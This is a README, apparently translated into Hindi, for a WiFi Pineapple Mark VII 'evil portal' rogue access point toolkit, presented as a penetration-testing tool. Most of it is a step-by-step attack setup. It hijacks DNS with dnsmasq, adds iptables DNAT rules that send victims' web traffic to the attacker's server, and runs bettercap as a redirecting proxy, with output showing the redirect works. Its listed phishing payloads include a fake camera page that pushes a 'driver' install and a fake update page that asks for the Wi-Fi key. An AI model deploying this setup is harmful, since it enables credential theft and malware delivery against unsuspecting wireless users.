
रोग एक्सेस पॉइंट टूलकिट वाईफाई पेनिट्रेशन टेस्टिंग के लिए, ईविल पोर्टल फिशिंग पेलोड तैनात करके क्रेडेंशियल कैप्चर करने और वायरलेस नेटवर्क पर सोशल इंजीनियरिंग हमले करने के लिए।
लेखक:: TW-D
संस्करण:: 1.0.0
कॉपीराइट:: कॉपीराइट (c) 2024 TW-D
लाइसेंस:: रूबी के समान शर्तों के तहत वितरित
आवश्यकताएँ:: PHP >= 8.1, Ruby >= 2.7.0p0 और WiFi Pineapple Mark VII 2.1.3-स्थिर
स्थापना (डेबियन-आधारित लिनक्स वितरण)::
sudo apt-get install php8.1-cli php8.1-curl
sudo apt-get install build-essential ruby ruby-dev libpcap-dev
sudo gem install sorted_set bettercap
एक ईविल पोर्टल एक तकनीक है जिसका उपयोग वाई-फाई नेटवर्क के उपयोगकर्ताओं को धोखा देने के लिए किया जाता है, उन्हें अपेक्षित प्रमाणीकरण या होम पेज के बजाय एक दुर्भावनापूर्ण वेब पेज पर पुनर्निर्देशित करके।
नोट : "मुद्दे" और "पुल अनुरोध" स्वागत हैं।
| ऑपरेटिंग सिस्टम वेब ब्राउज़र के साथ/बिना | सूचना प्रकार |
|---|---|
| Ubuntu 22.04 | कोई नहीं |
| Android 8.0.0 | सिस्टम |
| Microsoft Windows 10 | कोई नहीं |
| Raspberry Pi bookworm | कोई नहीं |
| Ubuntu 22.04 with Mozilla Firefox | चेतावनी |
| Microsoft Windows 10 with Mozilla Firefox | चेतावनी |
| Raspberry Pi bookworm with Mozilla Firefox | चेतावनी |
वाई-फाई पाइनएप्पल को अपने कंप्यूटर से USB-C केबल के माध्यम से कनेक्ट करें।
सेटिंग्स > नेटवर्किंग > वायरलेस क्लाइंट मोड : wlan2 इंटरफ़ेस डिस्कनेक्ट किया जाना चाहिए।
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
inet 172.16.42.100 netmask 255.255.255.0 broadcast 172.16.42.255
[...]
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp closed mdns
53/udp open domain
5353/udp closed zeroconf
[...]
hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp open mdns
53/udp open domain
5353/udp open zeroconf
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate
hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading
hacker@hacker-computer:~$ exit
"./payloads/" निर्देशिका में, आप पाएंगे :
| विकास | लेखक | विवरण | उपयोग कैसे करें |
|---|---|---|---|
| skeleton.html | TW-D | विकास के लिए खाली पेलोड। | दस्तावेज़ीकरण |
| निष्पादन | लेखक | विवरण | उपयोग कैसे करें |
|---|---|---|---|
| web-camera.html | TW-D | एक नकली निगरानी वीडियो का अनुकरण करता है और इसके संचालन के लिए एक ड्राइवर की स्थापना की मांग करता है। | दस्तावेज़ीकरण |

| फ़िशिंग | लेखक | विवरण | उपयोग कैसे करें |
|---|---|---|---|
| wifi_security-key.html | TW-D | इंटरनेट उपकरण के एक नकली अपडेट का अनुकरण करता है और जारी रखने के लिए वाई-फाई सुरक्षा कुंजी की मांग करता है। | दस्तावेज़ीकरण |
